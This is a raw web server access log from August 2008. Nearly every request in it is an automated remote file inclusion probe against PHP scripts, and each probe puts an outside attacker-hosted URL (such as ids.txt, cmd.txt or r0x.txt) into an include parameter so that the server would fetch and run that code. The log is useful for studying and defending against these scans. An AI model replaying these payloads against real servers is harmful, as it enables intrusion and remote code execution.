91.186.30.30 - - [22/Aug/2008:03:33:23 -0500] "GET /logs/access_log.1208044800//Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:33:23 -0500] "GET //Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:33:23 -0500] "GET //Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:33:23 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:33:23 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:33:44 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:33:44 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:33:45 -0500] "GET //Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:33:45 -0500] "GET //Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
80.67.20.130 - - [22/Aug/2008:03:34:43 -0500] "GET /logs/access_log.1216598400//?pg=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
89.208.43.121 - - [22/Aug/2008:03:34:45 -0500] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
91.186.30.30 - - [22/Aug/2008:03:35:50 -0500] "GET /logs/access_log.1206230400//Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
91.186.30.30 - - [22/Aug/2008:03:35:51 -0500] "GET /logs/access_log.1206230400//Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
85.159.91.143 - - [22/Aug/2008:03:36:12 -0500] "GET /logs/access_log.1206230400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:03:36:13 -0500] "GET /logs/access_log.1206230400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
83.211.35.160 - - [22/Aug/2008:03:37:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
83.211.35.160 - - [22/Aug/2008:03:37:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
200.11.67.242 - - [22/Aug/2008:03:40:31 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
200.11.67.242 - - [22/Aug/2008:03:40:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
216.180.241.37 - - [22/Aug/2008:03:40:38 -0500] "GET /logs/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
216.180.241.37 - - [22/Aug/2008:03:40:39 -0500] "GET /modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
62.87.154.41 - - [22/Aug/2008:03:41:01 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.87.154.41 - - [22/Aug/2008:03:41:02 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
83.211.35.160 - - [22/Aug/2008:03:42:00 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
83.211.35.160 - - [22/Aug/2008:03:42:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:03:43:41 -0500] "GET /logs/access_log.1214438400/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
93.189.56.218 - - [22/Aug/2008:03:43:52 -0500] "GET /logs/access_log.1178064000 HTTP/1.1" 200 98304 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
220.73.137.93 - - [22/Aug/2008:03:44:24 -0500] "GET /logs/access_log.1214438400/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
83.240.154.200 - - [22/Aug/2008:03:47:39 -0500] "GET /logs/access_log.1206230400//modules/TotalCalendar/about.php?inc_dir=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
83.240.154.200 - - [22/Aug/2008:03:47:39 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
83.240.154.200 - - [22/Aug/2008:03:47:39 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
85.159.91.143 - - [22/Aug/2008:03:48:34 -0500] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:03:48:35 -0500] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:03:48:37 -0500] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:03:48:37 -0500] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
66.249.71.40 - - [22/Aug/2008:03:49:10 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
208.116.39.133 - - [22/Aug/2008:03:51:16 -0500] "GET /logs/errors.php?error=http://kihineh.net/tmp/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
208.116.39.133 - - [22/Aug/2008:03:51:16 -0500] "GET /errors.php?error=http://kihineh.net/tmp/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
89.111.176.64 - - [22/Aug/2008:03:53:05 -0500] "GET /logs/access_log.1208044800/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
60.244.114.2 - - [22/Aug/2008:03:53:37 -0500] "GET /logs/access_log.1214524800/errors.php?error=? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
60.244.114.2 - - [22/Aug/2008:03:53:39 -0500] "GET /errors.php?error=? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
60.244.114.2 - - [22/Aug/2008:03:53:39 -0500] "GET /logs/errors.php?error=? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
75.125.140.178 - - [22/Aug/2008:03:54:13 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hardsecurity.org/id?? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
65.98.70.18 - - [22/Aug/2008:03:54:24 -0500] "GET /logs/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
65.98.70.18 - - [22/Aug/2008:03:54:24 -0500] "GET /admin/editor2/errors.php?error=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
66.135.41.76 - - [22/Aug/2008:03:57:11 -0500] "GET ///vwar/backup/errors.php?error=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
66.135.41.76 - - [22/Aug/2008:03:57:11 -0500] "GET /logs///vwar/backup/errors.php?error=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
66.135.41.76 - - [22/Aug/2008:03:57:11 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
66.135.41.76 - - [22/Aug/2008:03:57:19 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
64.22.100.83 - - [22/Aug/2008:03:58:41 -0500] "GET /logs/errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
64.22.100.83 - - [22/Aug/2008:03:58:41 -0500] "GET /errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
209.126.254.80 - - [22/Aug/2008:03:59:17 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.76"
209.126.254.80 - - [22/Aug/2008:03:59:17 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
220.73.137.93 - - [22/Aug/2008:03:59:17 -0500] "GET /logs/access_log.1214524800/modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:03:59:27 -0500] "GET /logs/access_log.1214524800/modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
74.55.136.66 - - [22/Aug/2008:03:59:32 -0500] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path[docroot]=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:03:59:32 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:03:59:33 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
128.163.2.43 - - [22/Aug/2008:04:00:36 -0500] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
128.163.2.43 - - [22/Aug/2008:04:00:36 -0500] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
205.234.200.223 - - [22/Aug/2008:04:01:36 -0500] "GET /logs/errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.200.223 - - [22/Aug/2008:04:01:36 -0500] "GET /errors.php?error=http://tomromeo.com/board/chitid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
204.3.160.212 - - [22/Aug/2008:04:02:08 -0500] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 331 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:04:02:09 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 304 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:04:02:09 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 309 "-""libwww-perl/5.50"
81.169.166.27 - - [22/Aug/2008:04:02:27 -0500] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.69"
81.169.166.27 - - [22/Aug/2008:04:02:27 -0500] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.69"
216.180.241.37 - - [22/Aug/2008:04:02:37 -0500] "GET /logs/access_log.1208044800/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
204.3.160.212 - - [22/Aug/2008:04:02:37 -0500] "GET /logs/access_log.1208044800//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 340 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:04:02:37 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 313 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:04:02:38 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 318 "-""libwww-perl/5.50"
198.106.193.60 - - [22/Aug/2008:04:03:15 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 318 "-""libwww-perl/5.50"
198.106.193.60 - - [22/Aug/2008:04:03:15 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 309 "-""libwww-perl/5.50"
198.106.193.60 - - [22/Aug/2008:04:03:15 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 313 "-""libwww-perl/5.50"
198.106.193.60 - - [22/Aug/2008:04:03:15 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 304 "-""libwww-perl/5.50"
89.107.184.145 - - [22/Aug/2008:04:03:22 -0500] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
89.107.184.145 - - [22/Aug/2008:04:03:23 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
89.107.184.145 - - [22/Aug/2008:04:03:23 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.230.21.231 - - [22/Aug/2008:04:04:14 -0500] "GET /logs/bughttp://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:04:04:14 -0500] "GET /bughttp://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
204.3.160.212 - - [22/Aug/2008:04:05:12 -0500] "GET /logs/access_log.1203120000//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 331 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:04:05:29 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 304 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:04:05:29 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 313 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:04:05:30 -0500] "GET /logs/access_log.1203120000//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 340 "-""libwww-perl/5.50"
83.240.154.200 - - [22/Aug/2008:04:07:08 -0500] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
83.240.154.200 - - [22/Aug/2008:04:07:08 -0500] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
89.107.184.145 - - [22/Aug/2008:04:07:27 -0500] "GET /logs/access_log.1203120000//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
66.135.41.76 - - [22/Aug/2008:04:07:50 -0500] "GET ///vwar/backup/errors.php?error=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
72.9.233.10 - - [22/Aug/2008:04:09:17 -0500] "GET /logs/errors.php?error=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.9.233.10 - - [22/Aug/2008:04:09:17 -0500] "GET /errors.php?error=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.234.200.150 - - [22/Aug/2008:04:10:12 -0500] "GET /logs//include/write.php?dir=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
200.234.200.150 - - [22/Aug/2008:04:10:12 -0500] "GET //include/write.php?dir=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
65.98.70.18 - - [22/Aug/2008:04:11:15 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
204.3.160.212 - - [22/Aug/2008:04:11:29 -0500] "GET /logs/access_log.1206230400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 340 "-""libwww-perl/5.50"
204.3.160.212 - - [22/Aug/2008:04:11:30 -0500] "GET /logs/access_log.1206230400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.0" 404 331 "-""libwww-perl/5.50"
89.208.43.121 - - [22/Aug/2008:04:13:55 -0500] "GET /logs//include/write.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:04:13:56 -0500] "GET //include/write.php?dir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
193.34.17.159 - - [22/Aug/2008:04:15:07 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
193.34.17.159 - - [22/Aug/2008:04:15:08 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
193.34.17.159 - - [22/Aug/2008:04:15:11 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
193.34.17.159 - - [22/Aug/2008:04:15:11 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
89.107.184.145 - - [22/Aug/2008:04:15:17 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
89.107.184.145 - - [22/Aug/2008:04:16:34 -0500] "GET /logs/access_log.1206230400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
74.55.136.66 - - [22/Aug/2008:04:18:01 -0500] "GET /logs//include/write.php?dir=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:04:18:02 -0500] "GET //include/write.php?dir=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
89.107.184.145 - - [22/Aug/2008:04:18:32 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
89.107.184.145 - - [22/Aug/2008:04:18:33 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://b2designs.co.za//components/com_extcalendar/upload/id44.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
208.116.1.202 - - [22/Aug/2008:04:18:55 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
208.116.1.202 - - [22/Aug/2008:04:18:55 -0500] "GET //config/dbutil.bck.php?confdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
208.116.1.202 - - [22/Aug/2008:04:21:09 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
208.116.1.202 - - [22/Aug/2008:04:22:16 -0500] "GET /logs/access_log.1214179200//config/dbutil.bck.php?confdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
74.55.136.66 - - [22/Aug/2008:04:23:09 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:04:23:09 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:04:23:09 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
70.85.201.66 - - [22/Aug/2008:04:23:36 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
70.85.201.66 - - [22/Aug/2008:04:23:36 -0500] "GET //index.php?DOCUMENT_ROOT=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
64.185.237.191 - - [22/Aug/2008:04:23:56 -0500] "GET /logs//?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 200 96221 "-""libwww-perl/5.810"
64.185.237.191 - - [22/Aug/2008:04:23:56 -0500] "GET //?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
87.238.163.18 - - [22/Aug/2008:04:24:39 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
87.238.163.18 - - [22/Aug/2008:04:24:39 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
217.79.182.204 - - [22/Aug/2008:04:26:48 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
217.79.182.204 - - [22/Aug/2008:04:26:49 -0500] "GET /lostpasswd.php?env[include_prefix]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.77.242 - - [22/Aug/2008:04:27:44 -0500] "GET /logs//?path%5Bdocroot%5D=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:04:27:44 -0500] "GET //?path%5Bdocroot%5D=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
220.73.137.93 - - [22/Aug/2008:04:27:57 -0500] "GET /logs/access_log.1214438400/modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:04:29:05 -0500] "GET /logs/access_log.1214438400/modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:04:29:26 -0500] "GET /logs//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:04:29:27 -0500] "GET //?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:04:29:32 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:04:29:32 -0500] "GET //?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:04:29:33 -0500] "GET /logs//?path%5Bdocroot%5D=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
87.106.77.242 - - [22/Aug/2008:04:29:41 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:04:29:42 -0500] "GET //?path%5Bdocroot%5D=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
